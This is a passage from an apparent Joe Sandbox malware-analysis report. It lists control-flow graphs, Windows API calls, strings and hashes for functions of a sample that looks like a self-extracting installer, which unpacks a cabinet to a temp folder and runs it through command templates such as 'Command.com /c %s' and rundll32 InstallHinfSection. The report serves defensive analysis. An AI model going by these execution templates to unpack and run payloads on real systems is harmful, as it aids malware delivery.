GetFileAttributesA 184->188 189 7ff7e6e81aa2-7ff7e6e81aad 184->189 185->184 190 7ff7e6e81a60-7ff7e6e81a67 185->190 193 7ff7e6e81b7e-7ff7e6e81b88 188->193 194 7ff7e6e81b01-7ff7e6e81b03 188->194 189->183 195 7ff7e6e81a6a-7ff7e6e81a71 190->195 196 7ff7e6e81b8f-7ff7e6e81b99 193->196 194->193 200 7ff7e6e81b05-7ff7e6e81b16 194->200 195->195 201 7ff7e6e81a73 195->201 202 7ff7e6e81bae-7ff7e6e81bb9 196->202 203 7ff7e6e81b9b-7ff7e6e81ba1 196->203 197->189 205 7ff7e6e818d7-7ff7e6e8194d GetPrivateProfileIntA GetPrivateProfileStringA 197->205 198->197 206 7ff7e6e81b1d-7ff7e6e81b27 200->206 208 7ff7e6e81a78-7ff7e6e81a7f 201->208 211 7ff7e6e81bbc-7ff7e6e81bcc call 7ff7e6e82a6c 202->211 203->202 210 7ff7e6e81ba3-7ff7e6e81bac 203->210 212 7ff7e6e81984-7ff7e6e81993 205->212 213 7ff7e6e8194f-7ff7e6e8197f call 7ff7e6e81008 * 2 205->213 214 7ff7e6e81b3c-7ff7e6e81b4d 206->214 215 7ff7e6e81b29-7ff7e6e81b2f 206->215 208->208 209 7ff7e6e81a81-7ff7e6e81aa0 LocalAlloc 208->209 209->189 217 7ff7e6e81ab2-7ff7e6e81ac6 call 7ff7e6e8114c 209->217 210->196 210->202 226 7ff7e6e81bd1-7ff7e6e81bd5 211->226 222 7ff7e6e819ba 212->222 223 7ff7e6e81995-7ff7e6e819b8 GetShortPathNameA 212->223 213->226 214->211 221 7ff7e6e81b4f-7ff7e6e81b52 214->221 215->214 220 7ff7e6e81b31-7ff7e6e81b3a 215->220 217->226 220->206 220->214 221->211 228 7ff7e6e81b54-7ff7e6e81b7c call 7ff7e6e81084 * 2 221->228 224 7ff7e6e819c1-7ff7e6e819ee call 7ff7e6e8114c 222->224 223->224 224->226 226->199 228->211
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                        • String ID: .BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                        • API String ID: 383838535-981289760
                                                                                                        • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                        • Instruction ID: b440b852abc71ed7948fd6c0c004b6f8ac804348998c73f3bd6066376c63e359
                                                                                                        • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                        • Instruction Fuzzy Hash: F0E17D62A287C285EB11AB14E8443FBA7A1FB45B84FD84136DA8D0B7D5DF3DD509C311
                                                                                                        Function 00007FF7E6E866C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 238 7ff7e6e866c4-7ff7e6e86724 call 7ff7e6e85050 LocalAlloc 241 7ff7e6e86756-7ff7e6e8676a call 7ff7e6e85050 238->241 242 7ff7e6e86726-7ff7e6e86749 call 7ff7e6e84dcc call 7ff7e6e87700 238->242 248 7ff7e6e8676c-7ff7e6e867a3 call 7ff7e6e84dcc LocalFree 241->248 249 7ff7e6e867a5-7ff7e6e867ea lstrcmpA LocalFree 241->249 256 7ff7e6e8674f-7ff7e6e86751 242->256 248->256 250 7ff7e6e867ec-7ff7e6e867ee 249->250 251 7ff7e6e86837-7ff7e6e8683d 249->251 254 7ff7e6e867fb 250->254 255 7ff7e6e867f0-7ff7e6e867f9 250->255 257 7ff7e6e86b14-7ff7e6e86b38 call 7ff7e6e87ac8 251->257 258 7ff7e6e86843-7ff7e6e86849 251->258 260 7ff7e6e867fe-7ff7e6e8680e call 7ff7e6e864e4 254->260 255->254 255->260 261 7ff7e6e86b3a-7ff7e6e86b66 call 7ff7e6e88470 256->261 257->261 258->257 263 7ff7e6e8684f-7ff7e6e86870 GetTempPathA 258->263 273 7ff7e6e86814-7ff7e6e86832 call 7ff7e6e84dcc 260->273 274 7ff7e6e86b0f-7ff7e6e86b12 260->274 267 7ff7e6e868ad-7ff7e6e868b9 263->267 268 7ff7e6e86872-7ff7e6e8687e call 7ff7e6e864e4 263->268 270 7ff7e6e868bc-7ff7e6e868bf 267->270 276 7ff7e6e86883-7ff7e6e86885 268->276 275 7ff7e6e868c4-7ff7e6e868ce 270->275 273->256 274->261 278 7ff7e6e868e1-7ff7e6e868f3 275->278 279 7ff7e6e868d0-7ff7e6e868d5 275->279 276->274 280 7ff7e6e8688b-7ff7e6e86895 call 7ff7e6e82468 276->280 284 7ff7e6e86adb-7ff7e6e86b04 GetWindowsDirectoryA call 7ff7e6e86ca4 278->284 285 7ff7e6e868f9-7ff7e6e8690f GetDriveTypeA 278->285 279->278 283 7ff7e6e868d7-7ff7e6e868df 279->283 280->267 290 7ff7e6e86897-7ff7e6e868a7 call 7ff7e6e864e4 280->290 283->275 283->278 284->256 295 7ff7e6e86b0a 284->295 288 7ff7e6e86916-7ff7e6e8692a GetFileAttributesA 285->288 289 7ff7e6e86911-7ff7e6e86914 285->289 292 7ff7e6e86930-7ff7e6e86933 288->292 293 7ff7e6e869bd-7ff7e6e869d0 call 7ff7e6e86ca4 288->293 289->288 289->292 290->267 290->274 297 7ff7e6e869ad 292->297 298 7ff7e6e86935-7ff7e6e8693f 292->298 305 7ff7e6e869f4-7ff7e6e86a00 call 7ff7e6e82468 293->305 306 7ff7e6e869d2-7ff7e6e869de call 7ff7e6e82468 293->306 295->270 299 7ff7e6e869b1-7ff7e6e869b8 297->299 298->299 300 7ff7e6e86941-7ff7e6e86953 298->300 304 7ff7e6e86ad2-7ff7e6e86ad5 299->304 300->299 303 7ff7e6e86955-7ff7e6e86981 GetDiskFreeSpaceA 300->303 303->297 308 7ff7e6e86983-7ff7e6e869a4 MulDiv 303->308 304->284 304->285 313 7ff7e6e86a16-7ff7e6e86a3e call 7ff7e6e87ba8 GetFileAttributesA 305->313 314 7ff7e6e86a02-7ff7e6e86a11 GetWindowsDirectoryA 305->314 306->297 315 7ff7e6e869e0-7ff7e6e869f2 call 7ff7e6e86ca4 306->315 308->297 311 7ff7e6e869a6-7ff7e6e869ab 308->311 311->293 311->297 320 7ff7e6e86a55 313->320 321 7ff7e6e86a40-7ff7e6e86a53 CreateDirectoryA 313->321 314->313 315->297 315->305 322 7ff7e6e86a58-7ff7e6e86a5a 320->322 321->322 323 7ff7e6e86a6d-7ff7e6e86a8e SetFileAttributesA 322->323 324 7ff7e6e86a5c-7ff7e6e86a6b 322->324 325 7ff7e6e86a91-7ff7e6e86a9b 323->325 324->304 326 7ff7e6e86a9d-7ff7e6e86aa3 325->326 327 7ff7e6e86aaf-7ff7e6e86acc call 7ff7e6e864e4 325->327 326->327 328 7ff7e6e86aa5-7ff7e6e86aad 326->328 327->274 331 7ff7e6e86ace 327->331 328->325 328->327 331->304
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                        • API String ID: 3973824516-1216675450
                                                                                                        • Opcode ID: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                                                        • Instruction ID: 451cc461acf7ff4e818d2a90f9e56dcc5b67a5be10a395c6e0615d5b0f7be54b
                                                                                                        • Opcode Fuzzy Hash: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                                                        • Instruction Fuzzy Hash: D3D14322A286C286EB10AB14AC5077BE7A1FB85F44FD84136DACD4B6D5DF3DD405C722
                                                                                                        Function 00007FF7E6E82DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 332 7ff7e6e82db4-7ff7e6e82e4d call 7ff7e6e88b09 memset * 2 call 7ff7e6e85050 337 7ff7e6e830a5 332->337 338 7ff7e6e82e53-7ff7e6e82e94 CreateEventA SetEvent call 7ff7e6e85050 332->338 340 7ff7e6e830aa-7ff7e6e830b9 call 7ff7e6e84dcc 337->340 343 7ff7e6e82e96-7ff7e6e82ea0 338->343 344 7ff7e6e82ec3-7ff7e6e82ecb 338->344 345 7ff7e6e830be 340->345 349 7ff7e6e82ea2-7ff7e6e82ebe call 7ff7e6e84dcc 343->349 347 7ff7e6e82ecd-7ff7e6e82ecf 344->347 348 7ff7e6e82ed5-7ff7e6e82ef0 call 7ff7e6e85050 344->348 346 7ff7e6e830c0-7ff7e6e830e3 call 7ff7e6e88470 345->346 347->348 351 7ff7e6e82fa3-7ff7e6e82fb3 call 7ff7e6e870a8 347->351 359 7ff7e6e82efe-7ff7e6e82f1c CreateMutexA 348->359 360 7ff7e6e82ef2-7ff7e6e82efc 348->360 349->345 361 7ff7e6e82fb5-7ff7e6e82fbf 351->361 362 7ff7e6e82fc4-7ff7e6e82fcb 351->362 359->351 363 7ff7e6e82f22-7ff7e6e82f33 GetLastError 359->363 360->349 361->340 364 7ff7e6e82fde-7ff7e6e82ffd FindResourceExA 362->364 365 7ff7e6e82fcd-7ff7e6e82fd9 call 7ff7e6e8204c 362->365 363->351 366 7ff7e6e82f35-7ff7e6e82f48 363->366 368 7ff7e6e83014-7ff7e6e8301b 364->368 369 7ff7e6e82fff-7ff7e6e83011 LoadResource 364->369 365->345 370 7ff7e6e82f4a-7ff7e6e82f60 call 7ff7e6e84dcc 366->370 371 7ff7e6e82f62-7ff7e6e82f7f call 7ff7e6e84dcc 366->371 374 7ff7e6e8301d-7ff7e6e83024 #17 368->374 375 7ff7e6e83029-7ff7e6e83030 368->375 369->368 382 7ff7e6e82f81-7ff7e6e82f9e CloseHandle 370->382 371->351 371->382 374->375 378 7ff7e6e8303a-7ff7e6e83044 call 7ff7e6e83bf4 375->378 379 7ff7e6e83032-7ff7e6e83035 375->379 378->345 384 7ff7e6e83046-7ff7e6e83055 378->384 379->346 382->345 384->379 385 7ff7e6e83057-7ff7e6e83061 384->385 385->379 386 7ff7e6e83063-7ff7e6e8306a 385->386 386->379 387 7ff7e6e8306c-7ff7e6e83073 call 7ff7e6e812ec 386->387 387->379 390 7ff7e6e83075-7ff7e6e830a1 call 7ff7e6e87ac8 387->390 390->345 393 7ff7e6e830a3 390->393 393->379
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                        • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                        • API String ID: 3100096412-78895606
                                                                                                        • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                        • Instruction ID: 0d24ba6da8cd8088c4a2a4e68d2ab880634dbe1c1d19188719193a0d5ab615ed
                                                                                                        • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                        • Instruction Fuzzy Hash: B0816E21E286C386F720BB54AC0177BE690BB95F54FD84037D98E4A6E5DF3CA405CB22
                                                                                                        Function 00007FF7E6E86CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 394 7ff7e6e86ca4-7ff7e6e86d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff7e6e86d12-7ff7e6e86d3a call 7ff7e6e84dcc call 7ff7e6e87700 394->395 396 7ff7e6e86d3f-7ff7e6e86d7a GetDiskFreeSpaceA 394->396 411 7ff7e6e86fe9 395->411 397 7ff7e6e86f63-7ff7e6e86fb8 memset call 7ff7e6e87700 GetLastError FormatMessageA 396->397 398 7ff7e6e86d80-7ff7e6e86da8 MulDiv 396->398 407 7ff7e6e86fbd-7ff7e6e86fe4 call 7ff7e6e84dcc SetCurrentDirectoryA 397->407 398->397 401 7ff7e6e86dae-7ff7e6e86de4 GetVolumeInformationA 398->401 404 7ff7e6e86de6-7ff7e6e86e40 memset call 7ff7e6e87700 GetLastError FormatMessageA 401->404 405 7ff7e6e86e45-7ff7e6e86e68 SetCurrentDirectoryA 401->405 404->407 409 7ff7e6e86e6c-7ff7e6e86e73 405->409 407->411 414 7ff7e6e86e86-7ff7e6e86e99 409->414 415 7ff7e6e86e75-7ff7e6e86e7a 409->415 417 7ff7e6e86feb-7ff7e6e8701a call 7ff7e6e88470 411->417 419 7ff7e6e86e9d-7ff7e6e86ea0 414->419 415->414 418 7ff7e6e86e7c-7ff7e6e86e84 415->418 418->409 418->414 421 7ff7e6e86eae-7ff7e6e86eb2 419->421 422 7ff7e6e86ea2-7ff7e6e86eac 419->422 424 7ff7e6e86ed8-7ff7e6e86edf 421->424 425 7ff7e6e86eb4-7ff7e6e86ed3 call 7ff7e6e84dcc 421->425 422->419 422->421 426 7ff7e6e86f0e-7ff7e6e86f1f 424->426 427 7ff7e6e86ee1-7ff7e6e86ee9 424->427 425->411 431 7ff7e6e86f22-7ff7e6e86f2a 426->431 427->426 430 7ff7e6e86eeb-7ff7e6e86f0c 427->430 430->431 432 7ff7e6e86f2c-7ff7e6e86f30 431->432 433 7ff7e6e86f46-7ff7e6e86f49 431->433 434 7ff7e6e86f32 432->434 435 7ff7e6e86f4b-7ff7e6e86f4d 433->435 436 7ff7e6e86f4f-7ff7e6e86f52 433->436 437 7ff7e6e86f54-7ff7e6e86f5e 434->437 438 7ff7e6e86f34-7ff7e6e86f41 call 7ff7e6e824f8 434->438 435->434 436->434 437->417 438->417
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                        • API String ID: 4237285672-1955631000
                                                                                                        • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                        • Instruction ID: e9015b8092fdb04f8612f7bfadad28fc1092abbd61df13095deb76661ce63362
                                                                                                        • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                        • Instruction Fuzzy Hash: 99A16436A2878186E720AF14E84476BFBA1FB89B44F984136DA8D4BBD4DF3CD405CB11
                                                                                                        Function 00007FF7E6E85D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                        • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                        • Instruction ID: 32b065744f6efedf3d1370fa4dfe2a8953d256439e8a1c0a2f2ab2f6702bbd97
                                                                                                        • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                        • Instruction Fuzzy Hash: 4D51FB31A28B8286EB50AB14AC54776E7A0FB89F45FD84137D98E4A6D5DF3CE005C722
                                                                                                        Function 00007FF7E6E830EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151libraryfileloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 525 7ff7e6e830ec-7ff7e6e83114 526 7ff7e6e83116-7ff7e6e8311c 525->526 527 7ff7e6e83141-7ff7e6e83148 call 7ff7e6e85fe4 525->527 529 7ff7e6e8311e call 7ff7e6e860a4 526->529 530 7ff7e6e83134-7ff7e6e8313b call 7ff7e6e83f74 526->530 535 7ff7e6e8314e-7ff7e6e83155 call 7ff7e6e866c4 527->535 536 7ff7e6e83236 527->536 537 7ff7e6e83123-7ff7e6e83125 529->537 530->527 530->536 535->536 543 7ff7e6e8315b-7ff7e6e8319d GetSystemDirectoryA call 7ff7e6e87ba8 LoadLibraryA 535->543 539 7ff7e6e83238-7ff7e6e83258 call 7ff7e6e88470 536->539 537->536 540 7ff7e6e8312b-7ff7e6e83132 537->540 540->527 540->530 547 7ff7e6e831c9-7ff7e6e831de FreeLibrary 543->547 548 7ff7e6e8319f-7ff7e6e831b8 GetProcAddress 543->548 550 7ff7e6e831e4-7ff7e6e831ea 547->550 551 7ff7e6e83273-7ff7e6e83288 SetCurrentDirectoryA 547->551 548->547 549 7ff7e6e831ba-7ff7e6e831c3 DecryptFileA 548->549 549->547 550->551 554 7ff7e6e831f0-7ff7e6e8320b GetWindowsDirectoryA 550->554 552 7ff7e6e8328a-7ff7e6e8328f 551->552 553 7ff7e6e83291-7ff7e6e83297 551->553 559 7ff7e6e83212-7ff7e6e83230 call 7ff7e6e84dcc call 7ff7e6e87700 552->559 555 7ff7e6e8332d-7ff7e6e83335 553->555 556 7ff7e6e8329d-7ff7e6e832a4 553->556 557 7ff7e6e8320d 554->557 558 7ff7e6e8325a-7ff7e6e8326a call 7ff7e6e86ca4 554->558 560 7ff7e6e83349 555->560 561 7ff7e6e83337-7ff7e6e83339 555->561 562 7ff7e6e832a9-7ff7e6e832b7 556->562 557->559 569 7ff7e6e8326f-7ff7e6e83271 558->569 559->536 568 7ff7e6e8334b-7ff7e6e83359 560->568 561->560 565 7ff7e6e8333b-7ff7e6e83342 call 7ff7e6e82318 561->565 562->562 566 7ff7e6e832b9-7ff7e6e832c0 562->566 576 7ff7e6e83347 565->576 571 7ff7e6e832fb call 7ff7e6e85d90 566->571 572 7ff7e6e832c2-7ff7e6e832c9 566->572 574 7ff7e6e8335b-7ff7e6e83361 568->574 575 7ff7e6e83376-7ff7e6e8337d 568->575 569->536 569->551 584 7ff7e6e83300 571->584 572->571 577 7ff7e6e832cb-7ff7e6e832f1 call 7ff7e6e87ac8 572->577 574->575 580 7ff7e6e83363 call 7ff7e6e840c4 574->580 581 7ff7e6e83388-7ff7e6e8338d 575->581 582 7ff7e6e8337f-7ff7e6e83381 575->582 576->568 587 7ff7e6e832f6-7ff7e6e832f9 577->587 589 7ff7e6e83368-7ff7e6e8336a 580->589 581->539 582->581 586 7ff7e6e83383 call 7ff7e6e8494c 582->586 588 7ff7e6e83302 584->588 586->581 587->588 591 7ff7e6e83304-7ff7e6e8330e 588->591 592 7ff7e6e83313-7ff7e6e83321 call 7ff7e6e8772c 588->592 589->536 593 7ff7e6e83370 589->593 591->536 592->536 596 7ff7e6e83327 592->596 593->575 596->555
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                        • API String ID: 3010855178-3095882572
                                                                                                        • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                                                        • Instruction ID: cf554f752fc84ecac0340fbd414b3c25bcfb801531d2c7278e96a9f479bb106f
                                                                                                        • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                                                        • Instruction Fuzzy Hash: 87711A20E6C6C286FA60BB54AD45377E695BFA5F40FC84037D9CD4A2E1DE3CE8048662
                                                                                                        Function 00007FF7E6E864E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 597 7ff7e6e864e4-7ff7e6e86510 598 7ff7e6e86516-7ff7e6e8651b call 7ff7e6e863b8 597->598 599 7ff7e6e865df-7ff7e6e865ee 597->599 604 7ff7e6e86520-7ff7e6e86522 598->604 600 7ff7e6e865f1-7ff7e6e865fb 599->600 602 7ff7e6e865fd-7ff7e6e86603 600->602 603 7ff7e6e86610-7ff7e6e8661b 600->603 602->603 605 7ff7e6e86605-7ff7e6e8660e 602->605 606 7ff7e6e8661e-7ff7e6e86628 call 7ff7e6e86b70 603->606 607 7ff7e6e86688-7ff7e6e8668a 604->607 608 7ff7e6e86528-7ff7e6e8653e 604->608 605->600 605->603 620 7ff7e6e8662a-7ff7e6e8663d CreateDirectoryA 606->620 621 7ff7e6e86649-7ff7e6e8664b 606->621 609 7ff7e6e86698-7ff7e6e866bc call 7ff7e6e88470 607->609 611 7ff7e6e86541-7ff7e6e8654b 608->611 614 7ff7e6e8654d-7ff7e6e86553 611->614 615 7ff7e6e86560-7ff7e6e86575 611->615 614->615 616 7ff7e6e86555-7ff7e6e8655e 614->616 617 7ff7e6e865cc-7ff7e6e865dd call 7ff7e6e87ba8 615->617 618 7ff7e6e86577-7ff7e6e8658f GetSystemInfo 615->618 616->611 616->615 617->606 622 7ff7e6e865bb 618->622 623 7ff7e6e86591-7ff7e6e86594 618->623 624 7ff7e6e8667d-7ff7e6e86682 call 7ff7e6e87700 620->624 625 7ff7e6e8663f 620->625 626 7ff7e6e8664d-7ff7e6e86655 call 7ff7e6e86ca4 621->626 627 7ff7e6e8668c-7ff7e6e86693 621->627 632 7ff7e6e865c2-7ff7e6e865c7 call 7ff7e6e87ba8 622->632 630 7ff7e6e86596-7ff7e6e86599 623->630 631 7ff7e6e865b2-7ff7e6e865b9 623->631 624->607 625->621 639 7ff7e6e8665a-7ff7e6e8665c 626->639 627->609 636 7ff7e6e8659b-7ff7e6e8659e 630->636 637 7ff7e6e865a9-7ff7e6e865b0 630->637 631->632 632->617 636->617 640 7ff7e6e865a0-7ff7e6e865a7 636->640 637->632 639->627 641 7ff7e6e8665e-7ff7e6e86664 639->641 640->632 641->607 642 7ff7e6e86666-7ff7e6e8667b RemoveDirectoryA 641->642 642->607
                                                                                                        APIs
                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E8657C
                                                                                                        • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E8662F
                                                                                                        • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E8666F
                                                                                                          • Part of subcall function 00007FF7E6E863B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7E6E82CE1), ref: 00007FF7E6E86423
                                                                                                          • Part of subcall function 00007FF7E6E863B8: GetFileAttributesA.KERNELBASE ref: 00007FF7E6E86432
                                                                                                          • Part of subcall function 00007FF7E6E863B8: GetTempFileNameA.KERNEL32 ref: 00007FF7E6E8645B
                                                                                                          • Part of subcall function 00007FF7E6E863B8: DeleteFileA.KERNEL32 ref: 00007FF7E6E86473
                                                                                                          • Part of subcall function 00007FF7E6E863B8: CreateDirectoryA.KERNEL32 ref: 00007FF7E6E86484
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
